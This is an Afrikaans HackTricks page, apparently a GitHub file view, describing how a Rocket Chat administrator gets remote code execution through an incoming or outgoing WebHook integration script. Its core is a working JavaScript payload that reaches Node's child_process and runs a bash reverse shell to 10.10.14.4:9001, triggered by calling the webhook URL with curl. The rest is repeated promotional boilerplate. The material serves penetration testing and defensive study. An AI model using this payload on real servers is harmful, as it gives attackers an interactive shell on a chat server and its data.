Rocket Chat

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
Kry die amptelike PEASS & HackTricks swag
Ontdek Die PEASS Familie, ons versameling van eksklusiewe NFTs
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou haktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.

{% embed url="https://websec.nl/" %}

RCE

As jy 'n admin binne Rocket Chat is, kan jy RCE kry.

Gaan na Integrations en kies Nuwe Integrasi en kies enigeen: Inkomende WebHook of Uitgaande WebHook.
/admin/integrations/incoming

Volgens die dokumentasie, gebruik albei ES2015 / ECMAScript 6 (basies JavaScript) om die data te verwerk. So laat ons 'n rev shell vir javascript kry soos:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Stel die WebHook in (die kanaal en pos as gebruikersnaam moet bestaan):

Stel WebHook-skrip in:

Stoor veranderinge
Kry die gegenereerde WebHook URL:

Roep dit aan met curl en jy behoort die rev shell te ontvang

{% embed url="https://websec.nl/" %}

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kontroleer die INSKRYWINGSPLANNE!
Kry die amptelike PEASS & HackTricks swag
Ontdek Die PEASS-familie, ons versameling eksklusiewe NFT's
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

3.9 KiB Raw Blame History

Rocket Chat

RCE

3.9 KiB

Raw Blame History